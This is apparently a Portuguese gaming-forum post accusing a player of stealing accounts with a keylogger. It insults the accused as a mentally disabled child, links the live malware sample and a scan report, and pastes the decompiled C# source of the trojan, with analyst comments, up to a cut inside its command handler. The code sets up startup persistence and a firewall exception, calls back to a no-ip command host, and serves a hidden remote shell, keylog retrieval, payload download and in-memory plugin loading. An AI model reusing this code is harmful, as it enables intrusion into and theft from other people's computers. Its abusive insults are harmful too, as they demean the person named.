ThatGuyPT 457 Posted December 26, 2013 Pastor és o maior de sempre e és um puto ranhoso com 12 anos que mal pinta. Tudo começou quando o queixoso se veio queixar que perdeu tudo o que tinha no simplesmt2 devido a um ladrão chamado pastor alemão. Que ele roubava membros já não é novidade, mas desta vez usou keyloggers para isso e, tendo nós o IP dele, é motivo para apresentar uma queixa-crime que puna a família desse retardado mental. Ora vamos às provas. Skype: Ou pode ser encontrado em pastebin: http://pastebin.com/ngzAPT6j Avast: Vírus que ele enviou de prova: http://ge.tt/49FiDLB1/v/0 (NÃO ABRAM, AINDA ESTÁ ACTIVO, SE ABRIREM FUNCIONA COMO UM DROPPER) Virus Scan: https://www.virustotal.com/pt/file/7b9f6d7535f7aa0283c5f7b3f9a471a457d41b8f1c1fe26b02a6795d1a959cc7/analysis/1388069807/ E o cavalo de tróia do miúdo decompilado (pelo menos o dropper), como nem toda a gente é burra, estúpida, infantil e atrasada mental como ele: Fonte em C#: OK.cs // Type: ClassLibrary1.OK // Assembly: ClassLibrary1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 136249B6-9CCC-46D6-9130-51FC3F47C092 // Assembly location: C:UsersTiagoDocumentsPumaMt2_install.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.VisualBasic.Devices; using Microsoft.Win32; using System; using System.Collections.Generic; using System.Diagnostics; using System.Drawing; using System.Drawing.Imaging; using System.IO; using System.IO.Compression; using System.Net; using System.Net.Sockets; using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Security.Cryptography; using System.Text; using System.Threading; using System.Windows.Forms; namespace ClassLibrary1 { [standardModule] internal sealed class OK { public static string VN = "QXZhc3Q="; public static string VR = "0.6.4"; public static Mutex MT = (Mutex) null; public static string EXE = "Avast.exe"; public static string DR = "TEMP"; public static
string RG = "895f17b6a361b375326f1e686fac0cba"; // artifact name: suffix of the per-user settings key (DLV/GTV/STV), Run value name and Startup-folder file name (INS)

// ---------------------------------------------------------------------------
// Analyst notes (this listing is decompiler output as pasted on the page):
//  * NOTE(review): string literals appear to have lost their backslashes and
//    escaped quotes in the paste (compare `sf` below and the "Assembly
//    location" header). Paths and command lines printed here are therefore
//    probably not the exact runtime values - confirm against the binary.
//  * Every failure path swallows the exception through
//    ProjectData.SetProjectError/ClearProjectError (VB "On Error" lowering).
// ---------------------------------------------------------------------------

// Remote endpoint compiled into the sample (host name and TCP port); used by connect().
public static string H = "servidormt2.no-ip.biz";
public static string P = "1177";
// Field separator used inside every protocol message.
public static string Y = "|'|'|";
// BD is not read anywhere in the visible part of the class.
public static bool BD = Conversions.ToBoolean("True");
// Install switches read by INS(): Idr = copy to %DR%/EXE and relaunch,
// IsF = copy into the Startup folder, Isu = write the Run values.
public static bool Idr = Conversions.ToBoolean("True");
public static bool IsF = Conversions.ToBoolean("True");
public static bool Isu = Conversions.ToBoolean("True");
// Path of the running executable; also used as the lock object in Sendb()/connect().
public static FileInfo LO = new FileInfo(Application.ExecutablePath);
public static Computer F = new Computer();
// Terminator appended to every outgoing message by Sendb().
public static string SPL = "[endof]";
// Type `kl` is not shown on the page; the "kl" command returns its Logs member.
public static kl kq = (kl) null;
// True while the TCP session is considered up.
public static bool Cn = false;
// Registry path opened under HKCU and HKLM by INS() to add the Run values.
public static string sf = "SoftwareMicrosoftWindowsCurrentVersionRun";
public static TcpClient C = (TcpClient) null;
private static MemoryStream MeM = new MemoryStream();
private static byte[] b = new byte[5121];
// MD5 of the last screenshot thumbnail sent (see the "CAP" command).
private static string lastcap = "";
// Open handle on the Startup-folder copy (see INS).
public static FileStream FS;
// Hidden cmd.exe child used by the "rss"/"rs"/"rsc" commands.
private static Process Pro;

static OK() { }

// Native imports. As printed, the declarations lack `extern`; left as pasted.
[DllImport("psapi")] public static bool EmptyWorkingSet(long hProcess);
// Used by pr() with information class 29.
[DllImport("ntdll")] private static int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength);
// Used by Cam() to probe for video capture drivers.
[DllImport("avicap32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static bool capGetDriverDescriptionA(short wDriver, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszName, int cbName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVer, int cbVer);
// Used by HWD() to read the system volume serial number.
[DllImport("kernel32", EntryPoint = "GetVolumeInformationA", CharSet = CharSet.Ansi, SetLastError = true)] private static int GetVolumeInformation([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpRootPathName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpVolumeNameBuffer, int nVolumeNameSize, ref int lpVolumeSerialNumber, ref int lpMaximumComponentLength, ref int lpFileSystemFlags, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileSystemNameBuffer, int nFileSystemNameSize);
// Used by ACT() to read the foreground window title.
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static IntPtr GetForegroundWindow();
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static int GetWindowThreadProcessId(IntPtr hwnd, ref int lpdwProcessID);
[DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)] public static int GetWindowText(IntPtr hWnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string WinTitle, int MaxLength);
[DllImport("user32.dll", EntryPoint = "GetWindowTextLengthA", CharSet = CharSet.Ansi, SetLastError = true)] public static int GetWindowTextLength(long hwnd);

// Deletes value `n` from the HKCU subkey built from "Software" + RG. Errors are swallowed.
public static void DLV(string n) {
    try {
        OK.F.Registry.CurrentUser.OpenSubKey("Software" + OK.RG, true).DeleteValue(n);
    } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
}

// Reads value `n` from the same HKCU subkey; returns "" when missing or on any error.
public static string GTV(string n) {
    string str;
    try {
        str = Conversions.ToString(OK.F.Registry.CurrentUser.OpenSubKey("Software" + OK.RG).GetValue(n, (object) ""));
    } catch (Exception ex) { ProjectData.SetProjectError(ex); str = ""; ProjectData.ClearProjectError(); }
    return str;
}

// Writes value `n` = `t` under the same HKCU subkey (creating it). Returns boxed true/false.
public static object STV(string n, string t) {
    object obj;
    try {
        OK.F.Registry.CurrentUser.CreateSubKey("Software" + OK.RG).SetValue(n, (object) t);
        obj = (object) true;
    } catch (Exception ex) { ProjectData.SetProjectError(ex); obj = (object) false; ProjectData.ClearProjectError(); }
    return obj;
}

// Builds the "lv" check-in message that connect() sends right after the TCP
// connection is made. Fields, separated by Y, in order: Base64(name "_" volume
// serial), machine name, user name, last-write date of the executable, an empty
// field, OS name + "SP" + service pack + architecture label, webcam "Yes"/"No",
// VR, "..", Base64(foreground window title), then a comma-separated list of
// 32-character value names found in the settings key.
// The name comes from the registry value "vn" when set, otherwise from VN
// (Base64; "QXZhc3Q=" decodes to "Avast").
public static string inf() {
    string str1 = "lv" + OK.Y;
    string str2;
    try {
        if (Operators.CompareString(OK.GTV("vn"), "", false) == 0) {
            string str3 = str1;
            string s = OK.DEB(ref OK.VN) + "_" + OK.HWD();
            string str4 = OK.ENB(ref s);
            string str5 = OK.Y;
            str2 = str3 + str4 + str5;
        } else {
            string str3 = str1;
            string s1 = OK.GTV("vn");
            string s2 = OK.DEB(ref s1) + "_" + OK.HWD();
            string str4 = OK.ENB(ref s2);
            string str5 = OK.Y;
            str2 = str3 + str4 + str5;
        }
    } catch (Exception ex) {
        // Fallback: identify the host by volume serial only.
        ProjectData.SetProjectError(ex);
        string str3 = str1;
        string s = OK.HWD();
        string str4 = OK.ENB(ref s);
        string str5 = OK.Y;
        str2 = str3 + str4 + str5;
        ProjectData.ClearProjectError();
    }
    string str6;
    try {
        str6 = str2 + Environment.MachineName + OK.Y;
    } catch (Exception ex) { ProjectData.SetProjectError(ex); str6 = str2 + "??" + OK.Y; ProjectData.ClearProjectError(); }
    string str7;
    try {
        str7 = str6 + Environment.UserName + OK.Y;
    } catch (Exception ex) { ProjectData.SetProjectError(ex); str7 = str6 + "??" + OK.Y; ProjectData.ClearProjectError(); }
    string str8 = str7 + OK.FR() + OK.Y + "" + OK.Y;
    string str9;
    try {
        str9 = str8 + OK.F.Info.OSFullName.Replace("Microsoft", "").Replace("Windows", "Win").Replace("®", "").Replace("™", "").Replace(" ", " ").Replace(" Win", "Win");
    } catch (Exception ex) { ProjectData.SetProjectError(ex); str9 = str8 + "??"; ProjectData.ClearProjectError(); }
    string str10 = str9 + "SP";
    string str11;
    try {
        string[] strArray = Strings.Split(Environment.OSVersion.ServicePack, " ", -1, CompareMethod.Binary);
        if (strArray.Length == 1)
            str10 = str10 + "0";
        str11 = str10 + strArray[checked (strArray.Length - 1)];
    } catch (Exception ex) { ProjectData.SetProjectError(ex); str11 = str10 + "0"; ProjectData.ClearProjectError(); }
    string str12;
    try {
        // As written: label is " x64" when the ProgramFiles path contains "x86", otherwise " x86".
        str12 = !Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).Contains("x86") ? str11 + " x86" + OK.Y : str11 + " x64" + OK.Y;
    } catch (Exception ex) { ProjectData.SetProjectError(ex); str12 = str11 + OK.Y; ProjectData.ClearProjectError(); }
    string str13 = (!OK.Cam() ? str12 + "No" + OK.Y : str12 + "Yes" + OK.Y) + OK.VR + OK.Y + ".." + OK.Y + OK.ACT() + OK.Y;
    string str14 = "";
    try {
        // presumably the 32-character names are identifiers of modules cached by "inv"/"ret" - confirm
        string[] valueNames = OK.F.Registry.CurrentUser.CreateSubKey("Software" + OK.RG, RegistryKeyPermissionCheck.Default).GetValueNames();
        int index = 0;
        while (index < valueNames.Length) {
            string str3 = valueNames[index];
            if (str3.Length == 32)
                str14 = str14 + str3 + ",";
            checked { ++index; }
        }
    } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
    return str13 + str14;
}

// Last-write date of the running executable as yyyy-MM-dd, or "unknown" on error.
public static string FR() {
    string str;
    try {
        str = OK.LO.LastWriteTime.ToString("yyyy-MM-dd");
    } catch (Exception ex) { ProjectData.SetProjectError(ex); str = "unknown"; ProjectData.ClearProjectError(); }
    return str;
}

// Base64-encodes the UTF-8 bytes of `s`.
public static string ENB(ref string s) { return Convert.ToBase64String(Encoding.UTF8.GetBytes(s)); }

// Inverse of ENB: Base64 -> UTF-8 string.
public static string DEB(ref string s) { return Encoding.UTF8.GetString(Convert.FromBase64String(s)); }

// Returns `c` random lowercase ASCII letters; used for dropped file names in "rn"/"up".
public static string RN(int c) {
    VBMath.Randomize();
    Random random = new Random();
    string str1 = "";
    string str2 = "abcdefghijklmnopqrstuvwxyz";
    int num1 = 1;
    int num2 = c;
    int num3 = num1;
    while (num3 <= num2) {
        str1 = str1 + Conversions.ToString(str2[random.Next(0, str2.Length)]);
        checked { ++num3; }
    }
    return str1;
}

// String <-> bytes using the system default ANSI code page (Encoding.Default).
public static byte[] SB(ref string S) { return Encoding.Default.GetBytes(S); }

public static string BS(ref byte[] B) { return Encoding.Default.GetString(B); }

// Splits `b` around the separator `spl` into two byte arrays (text before the
// first separator, and a second segment starting after it), returned as byte[][].
public static Array fx(byte[] b, string spl) {
    List<byte[]> list = new List<byte[]>();
    MemoryStream memoryStream1 = new MemoryStream();
    MemoryStream memoryStream2 = new MemoryStream();
    string[] strArray = Strings.Split(OK.BS(ref b), spl, -1, CompareMethod.Binary);
    memoryStream1.Write(b, 0, strArray[0].Length);
    memoryStream2.Write(b, checked (strArray[0].Length + spl.Length), checked (b.Length - strArray[0].Length + spl.Length));
    list.Add(memoryStream1.ToArray());
    list.Add(memoryStream2.ToArray());
    memoryStream1.Dispose();
    memoryStream2.Dispose();
    return (Array) list.ToArray();
}

// GZip helper: CM == true compresses B, CM == false decompresses it. The
// decompress path reads a 4-byte length from near the end of the buffer
// (position Length - 5) to size the output array.
public static byte[] ZIP(byte[] B, ref bool CM) {
    if (CM) {
        MemoryStream memoryStream = new MemoryStream();
        GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Compress, true);
        gzipStream.Write(B, 0, B.Length);
        gzipStream.Dispose();
        memoryStream.Position = 0L;
        byte[] buffer = new byte[checked ((int) memoryStream.Length + 1)];
        memoryStream.Read(buffer, 0, buffer.Length);
        memoryStream.Dispose();
        return buffer;
    } else {
        MemoryStream memoryStream = new MemoryStream(B);
        GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Decompress);
        byte[] buffer = new byte[4];
        memoryStream.Position = checked (memoryStream.Length - 5L);
        memoryStream.Read(buffer, 0, 4);
        int count = BitConverter.ToInt32(buffer, 0);
        memoryStream.Position = 0L;
        byte[] array = new byte[checked (count - 1 + 1)];
        gzipStream.Read(array, 0, count);
        gzipStream.Dispose();
        memoryStream.Dispose();
        return array;
    }
}

// Returns true when any of capture driver indexes 0..4 reports a description,
// i.e. a webcam/capture device is present. Feeds the "Yes"/"No" field of inf().
public static bool Cam() {
    try {
        int num1 = 0;
        do {
            int num2 = (int) checked ((short) num1);
            string str1 = Strings.Space(100);
            // ISSUE: explicit reference operation
            // ISSUE: variable of a reference type
            string& lpszName = @str1;
            int cbName = 100;
            string str2 = (string) null;
            // ISSUE: explicit reference operation
            // ISSUE: variable of a reference type
            string& lpszVer = @str2;
            int cbVer = 100;
            if (OK.capGetDriverDescriptionA((short) num2, lpszName, cbName, lpszVer, cbVer))
                return true;
            checked { ++num1; }
        } while (num1 <= 4);
    } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
    return false;
}

// Returns the Base64-encoded title of the foreground window (" " when there is
// none or on error). Prefers Process.MainWindowTitle of the owning process and
// falls back to the GetWindowText result.
public static string ACT() {
    string str1;
    try {
        IntPtr foregroundWindow = OK.GetForegroundWindow();
        if (foregroundWindow == IntPtr.Zero) {
            string s = " ";
            str1 = OK.ENB(ref s);
        } else {
            int windowTextLength = OK.GetWindowTextLength((long) foregroundWindow);
            string str2 = Strings.StrDup(checked (windowTextLength + 1), "*");
            OK.GetWindowText(foregroundWindow, ref str2, checked (windowTextLength + 1));
            int lpdwProcessID;
            OK.GetWindowThreadProcessId(foregroundWindow, ref lpdwProcessID);
            if (lpdwProcessID == 0) {
                str1 = OK.ENB(ref str2);
            } else {
                try {
                    string mainWindowTitle = Process.GetProcessById(lpdwProcessID).MainWindowTitle;
                    str1 = OK.ENB(ref mainWindowTitle);
                } catch (Exception ex) { ProjectData.SetProjectError(ex); str1 = OK.ENB(ref str2); ProjectData.ClearProjectError(); }
            }
        }
    } catch (Exception ex) {
        ProjectData.SetProjectError(ex);
        string s = " ";
        str1 = OK.ENB(ref s);
        ProjectData.ClearProjectError();
    }
    return str1;
}

// Host identifier: volume serial number of %SystemDrive% in hex, or "ERR" on failure.
public static string HWD() {
    string str1;
    try {
        string str2 = Interaction.Environ("SystemDrive") + "";
        // ISSUE: explicit reference operation
        // ISSUE: variable of a reference type
        string& lpRootPathName = @str2;
        string str3 = (string) null;
        // ISSUE: explicit reference operation
        // ISSUE: variable of a reference type
        string& lpVolumeNameBuffer = @str3;
        int nVolumeNameSize = 0;
        int Number;
        // ISSUE: explicit reference operation
        // ISSUE: variable of a reference type
        int& lpVolumeSerialNumber = @Number;
        int num1 = 0;
        // ISSUE: explicit reference operation
        // ISSUE: variable of a reference type
        int& lpMaximumComponentLength = @num1;
        int num2 = 0;
        // ISSUE: explicit reference operation
        // ISSUE: variable of a reference type
        int& lpFileSystemFlags = @num2;
        string str4 = (string) null;
        // ISSUE: explicit reference operation
        // ISSUE: variable of a reference type
        string& lpFileSystemNameBuffer = @str4;
        int nFileSystemNameSize = 0;
        OK.GetVolumeInformation(lpRootPathName, lpVolumeNameBuffer, nVolumeNameSize, lpVolumeSerialNumber, lpMaximumComponentLength, lpFileSystemFlags, lpFileSystemNameBuffer, nFileSystemNameSize);
        str1 = Conversion.Hex(Number);
    } catch (Exception ex) { ProjectData.SetProjectError(ex); str1 = "ERR"; ProjectData.ClearProjectError(); }
    return str1;
}

// Loads a .NET assembly from a byte array (never written to disk by this
// method) and instantiates the first type whose full name ends with
// "." + ClassName. Returns null when no such type exists. Called by the
// "inv" and "ret" commands with ClassName "A".
public static object Plugin(byte[] ByteOfPlugin, string ClassName) {
    Module[] modules = Assembly.Load(ByteOfPlugin).GetModules();
    int index1 = 0;
    while (index1 < modules.Length) {
        Module module = modules[index1];
        System.Type[] types = module.GetTypes();
        int index2 = 0;
        while (index2 < types.Length) {
            System.Type type = types[index2];
            if (type.FullName.EndsWith("." + ClassName))
                return module.Assembly.CreateInstance(type.FullName);
            checked { ++index2; }
        }
        checked { ++index1; }
    }
    return (object) null;
}

// Calls pr(0); see pr() for the process flag involved.
public static void ED() { OK.pr(0); }

// True when F1 and F2 have the same file name and the same chain of parent
// directory names, compared case-insensitively.
private static bool CompDir(FileInfo F1, FileInfo F2) {
    if (Operators.CompareString(F1.Name.ToLower(), F2.Name.ToLower(), false) != 0)
        return false;
    DirectoryInfo directoryInfo1 = F1.Directory;
    DirectoryInfo directoryInfo2 = F2.Directory;
    while (Operators.CompareString(directoryInfo1.Name.ToLower(), directoryInfo2.Name.ToLower(), false) == 0) {
        directoryInfo1 = directoryInfo1.Parent;
        directoryInfo2 = directoryInfo2.Parent;
        if (directoryInfo1 == null & directoryInfo2 == null)
            return true;
        if (directoryInfo1 == null || directoryInfo2 == null)
            return false;
    }
    return false;
}

// Installation routine. Host artifacts it creates, in order (useful as hunt points):
//  1. Idr: if not already running from %DR% under the name EXE, copies itself
//     there, starts the copy and exits.
//  2. Sets the per-user environment variable SEE_MASK_NOZONECHECKS=1.
//  3. Runs a hidden `netsh firewall add allowedprogram ... ENABLE` for its own path.
//  4. Isu: writes a value named RG, pointing at its own path, under the `sf`
//     key in both HKCU and HKLM.
//  5. IsF: copies itself to the Startup folder as RG + ".exe" and keeps the
//     file open through FS.
public static void INS() {
    if (OK.Idr) {
        if (!OK.CompDir(OK.LO, new FileInfo(Interaction.Environ(OK.DR).ToLower() + "" + OK.EXE.ToLower()))) {
            try {
                if (System.IO.File.Exists(Interaction.Environ(OK.DR) + "" + OK.EXE))
                    System.IO.File.Delete(Interaction.Environ(OK.DR) + "" + OK.EXE);
                System.IO.File.Copy(OK.LO.FullName, Interaction.Environ(OK.DR) + "" + OK.EXE, true);
                Process.Start(Interaction.Environ(OK.DR) + "" + OK.EXE);
                ProjectData.EndApp();
            } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.EndApp(); ProjectData.ClearProjectError(); }
        }
    }
    try {
        Environment.SetEnvironmentVariable("SEE_MASK_NOZONECHECKS", "1", EnvironmentVariableTarget.User);
    } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
    try {
        Interaction.Shell("netsh firewall add allowedprogram "" + OK.LO.FullName + "" "" + OK.LO.Name + "" ENABLE", AppWinStyle.Hide, false, -1);
    } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
    if (OK.Isu) {
        try {
            OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).SetValue(OK.RG, (object) (""" + OK.LO.FullName + "" .."));
        } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
        try {
            OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).SetValue(OK.RG, (object) (""" + OK.LO.FullName + "" .."));
        } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
    }
    if (OK.IsF) {
        try {
            System.IO.File.Copy(OK.LO.FullName, Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "" + OK.RG + ".exe", true);
            OK.FS = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "" + OK.RG + ".exe", FileMode.Open);
        } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
    }
    Thread.Sleep(1000);
}

// Output/error handler of the hidden cmd.exe started by "rss": forwards each
// line as "rs" + Y + Base64(line). `e` is accessed late-bound via its "Data" member.
private static void RS(object a, object e) {
    try {
        string str1 = "rs";
        string str2 = OK.Y;
        object Instance = e;
        string s = Conversions.ToString(NewLateBinding.LateGet(Instance, (System.Type) null, "Data", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null));
        string str3 = OK.ENB(ref s);
        NewLateBinding.LateSetComplex(Instance, (System.Type) null, "Data", new object[1] { (object) s }, (string[]) null, (System.Type[]) null, 1 != 0, 0 != 0);
        OK.Send(str1 + str2 + str3);
    } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
}

// Exit handler of the hidden cmd.exe: reports "rsc" to the remote side.
private static void ex() {
    try {
        OK.Send("rsc");
    } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
}

// Command dispatcher. `b` is one received message; it is decoded with
// Encoding.Default and split on Y, and field 0 selects the handler:
//   proc  process list ("~"), kill ("k"), kill + delete image ("kd"), kill + restart ("re")
//   rss / rs / rsc  start, feed and stop a hidden cmd.exe with redirected I/O
//   kl    return OK.kq.Logs
//   inf   return name/host id plus H:P, DR, EXE and own process name
//   prof  set ("~"), set + read back ("!") or delete ("@") a value in the settings key
//   rn    write a received or downloaded payload to %temp% and start it
//   inv / ret  load an in-memory .NET module via Plugin() and drive it
//   CAP   screenshot thumbnail
//   P     echo "P"
//   un    uninstall ("~"), exit ("!"), restart ("@")
//   up    replace itself with a received or downloaded executable
//   RG    enumerate / edit arbitrary registry keys
// Any exception is reported back as "ER" + Y + command + Y + message.
// All message fields come from the remote peer and are used without validation.
public static void Ind(byte[] b) {
    string[] strArray1 = Strings.Split(OK.BS(ref b), OK.Y, -1, CompareMethod.Binary);
    try {
        string Left1 = strArray1[0];
        if (Operators.CompareString(Left1, "proc", false) == 0) {
            string Left2 = strArray1[1];
            if (Operators.CompareString(Left2, "~", false) == 0) {
                // Process listing: own PID, process count, then "pid,path,Base64(description)" entries sent in batches of 10.
                OK.Send("proc" + OK.Y + "pid" + OK.Y + Conversions.ToString(Process.GetCurrentProcess().Id));
                Process[] processes = Process.GetProcesses();
                OK.Send("proc" + OK.Y + "~" + OK.Y + Conversions.ToString(processes.Length));
                int num = 0;
                string Left3 = "";
                Process[] processArray = processes;
                int index1 = 0;
                while (index1 < processArray.Length) {
                    Process process = processArray[index1];
                    checked { ++num; }
                    try {
                        try {
                            string str = "";
                            try {
                                string fileDescription = process.MainModule.FileVersionInfo.FileDescription;
                                str = OK.ENB(ref fileDescription);
                            } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
                            Left3 = Left3 + OK.Y + Conversions.ToString(process.Id) + "," + process.MainModule.FileName + "," + str;
                        } catch (Exception ex) {
                            ProjectData.SetProjectError(ex);
                            string[] strArray2 = new string[7] { Left3, OK.Y, Conversions.ToString(process.Id), ",", process.MainModule.FileVersionInfo.FileName, ",", null };
                            string[] strArray3 = strArray2;
                            int index2 = 6;
                            string fileDescription = process.MainModule.FileVersionInfo.FileDescription;
                            string str = OK.ENB(ref fileDescription);
                            strArray3[index2] = str;
                            Left3 = string.Concat(strArray2);
                            ProjectData.ClearProjectError();
                        }
                    } catch (Exception ex1) {
                        // Fallback when MainModule is inaccessible: guess the image path under %windir% system32.
                        ProjectData.SetProjectError(ex1);
                        string str = "";
                        try {
                            string fileDescription = FileVersionInfo.GetVersionInfo(Interaction.Environ("windir") + "system32" + process.ProcessName + ".exe").FileDescription;
                            str = OK.ENB(ref fileDescription);
                        } catch (Exception ex2) { ProjectData.SetProjectError(ex2); ProjectData.ClearProjectError(); }
                        if (System.IO.File.Exists(Interaction.Environ("windir") + "system32" + process.ProcessName + ".exe")) {
                            FileInfo fileInfo = new FileInfo(Interaction.Environ("windir") + "system32" + process.ProcessName + ".exe");
                            Left3 = Left3 + OK.Y + Conversions.ToString(process.Id) + "," + fileInfo.FullName + "," + str;
                        } else
                            Left3 = Left3 + OK.Y + Conversions.ToString(process.Id) + "," + process.ProcessName + "," + str;
                        ProjectData.ClearProjectError();
                    }
                    if (num == 10) {
                        num = 0;
                        new Thread((ParameterizedThreadStart) (a0 => OK.Send(Conversions.ToString(a0))), 1).Start((object) ("proc" + OK.Y + "!" + Left3));
                        Left3 = "";
                    }
                    checked { ++index1; }
                }
                if (Operators.CompareString(Left3, "", false) == 0)
                    return;
                OK.Send("proc" + OK.Y + "!" + Left3);
            } else if (Operators.CompareString(Left2, "k", false) == 0) {
                // Kill every PID listed from field 2 onward; reports "RM" per PID or "ER" with the error text.
                int num1 = 2;
                int num2 = checked (strArray1.Length - 1);
                int index = num1;
                while (index <= num2) {
                    try {
                        Process.GetProcessById(Conversions.ToInteger(strArray1[index])).Kill();
                        OK.Send("proc" + OK.Y + "RM" + OK.Y + strArray1[index]);
                    } catch (Exception ex) {
                        ProjectData.SetProjectError(ex);
                        Exception exception = ex;
                        OK.Send("proc" + OK.Y + "ER" + OK.Y + exception.Message);
                        ProjectData.ClearProjectError();
                    }
                    checked { ++index; }
                }
            } else if (Operators.CompareString(Left2, "kd", false) == 0) {
                // Kill each listed PID, wait 2 s, then delete its image file from disk.
                int num1 = 2;
                int num2 = checked (strArray1.Length - 1);
                int index = num1;
                while (index <= num2) {
                    try {
                        string path = "";
                        Process processById = Process.GetProcessById(Conversions.ToInteger(strArray1[index]));
                        try {
                            path = processById.MainModule.FileVersionInfo.FileName;
                        } catch (Exception ex1) {
                            ProjectData.SetProjectError(ex1);
                            try {
                                path = processById.MainModule.FileName;
                            } catch (Exception ex2) { ProjectData.SetProjectError(ex2); ProjectData.ClearProjectError(); }
                            ProjectData.ClearProjectError();
                        }
                        processById.Kill();
                        OK.Send("proc" + OK.Y + "RM" + OK.Y + strArray1[index]);
                        Thread.Sleep(2000);
                        System.IO.File.Delete(path);
                        OK.Send("proc" + OK.Y + "ER" + OK.Y + "Deleted " + path);
                    } catch (Exception ex) {
                        ProjectData.SetProjectError(ex);
                        Exception exception = ex;
                        OK.Send("proc" + OK.Y + "ER" + OK.Y + exception.Message);
                        ProjectData.ClearProjectError();
                    }
                    checked { ++index; }
                }
            } else {
                if (Operators.CompareString(Left2, "re", false) != 0)
                    return;
                // Kill each listed PID and start its image file again.
                int num1 = 2;
                int num2 = checked (strArray1.Length - 1);
                int index = num1;
                while (index <= num2) {
                    try {
                        Process processById = Process.GetProcessById(Conversions.ToInteger(strArray1[index]));
                        string fileName;
                        try {
                            fileName = processById.MainModule.FileVersionInfo.FileName;
                        } catch (Exception ex1) {
                            ProjectData.SetProjectError(ex1);
                            try {
                                fileName = processById.MainModule.FileName;
                            } catch (Exception ex2) {
                                ProjectData.SetProjectError(ex2);
                                fileName = Interaction.Environ("windir") + "system32" + processById.ProcessName + ".exe";
                                ProjectData.ClearProjectError();
                            }
                            ProjectData.ClearProjectError();
                        }
                        processById.Kill();
                        OK.Send("proc" + OK.Y + "RM" + OK.Y + strArray1[index]);
                        Process.Start(fileName);
                        OK.Send("proc" + OK.Y + "ER" + OK.Y + "Started " + fileName);
                    } catch (Exception ex) {
                        ProjectData.SetProjectError(ex);
                        Exception exception = ex;
                        OK.Send("proc" + OK.Y + "ER" + OK.Y + exception.Message);
                        ProjectData.ClearProjectError();
                    }
                    checked { ++index; }
                }
            }
        } else if (Operators.CompareString(Left1, "rss", false) == 0) {
            // Remote shell start: windowless cmd.exe child with stdin/stdout/stderr redirected;
            // output is relayed by RS(), exit by ex(). Visible to EDR as cmd.exe with no window
            // parented by this process.
            try {
                OK.Pro.Kill();
            } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
            OK.Pro = new Process();
            OK.Pro.StartInfo.RedirectStandardOutput = true;
            OK.Pro.StartInfo.RedirectStandardInput = true;
            OK.Pro.StartInfo.RedirectStandardError = true;
            OK.Pro.StartInfo.FileName = "cmd.exe";
            OK.Pro.OutputDataReceived += new DataReceivedEventHandler(OK.RS);
            OK.Pro.ErrorDataReceived += new DataReceivedEventHandler(OK.RS);
            OK.Pro.Exited += (EventHandler) ((a0, a1) => OK.ex());
            OK.Pro.StartInfo.UseShellExecute = false;
            OK.Pro.StartInfo.CreateNoWindow = true;
            OK.Pro.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            OK.Pro.EnableRaisingEvents = true;
            OK.Send("rss");
            OK.Pro.Start();
            OK.Pro.BeginErrorReadLine();
            OK.Pro.BeginOutputReadLine();
        } else if (Operators.CompareString(Left1, "rs", false) == 0)
            // Remote shell input: Base64-decoded field 1 is written to the child's stdin.
            OK.Pro.StandardInput.WriteLine(OK.DEB(ref strArray1[1]));
        else if (Operators.CompareString(Left1, "rsc", false) == 0) {
            // Remote shell stop.
            try {
                OK.Pro.Kill();
            } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); }
            OK.Pro = (Process) null;
        } else if (Operators.CompareString(Left1, "kl", false) == 0)
            // Returns the Logs member of kq, Base64-encoded (type `kl` is not shown on the page).
            OK.Send("kl" + OK.Y + OK.ENB(ref OK.kq.Logs));
        else if (Operators.CompareString(Left1, "inf", false) == 0) {
            // Returns the name/host id plus the compiled-in H:P, DR, EXE and the current process name.
            string str1 = "inf" + OK.Y;
            string str2;
            if (Operators.CompareString(OK.GTV("vn"), "", false) == 0) {
                string str3 = str1;
                string s = OK.DEB(ref OK.VN) + "_" + OK.HWD();
                string str4 = OK.ENB(ref s);
                string str5 = OK.Y;
                str2 = str3 + str4 + str5;
            } else {
                string str3 = str1;
                string s1 = OK.GTV("vn");
                string s2 = OK.DEB(ref s1) + "_" + OK.HWD();
                string str4 = OK.ENB(ref s2);
                string str5 = OK.Y;
                str2 = str3 + str4 + str5;
            }
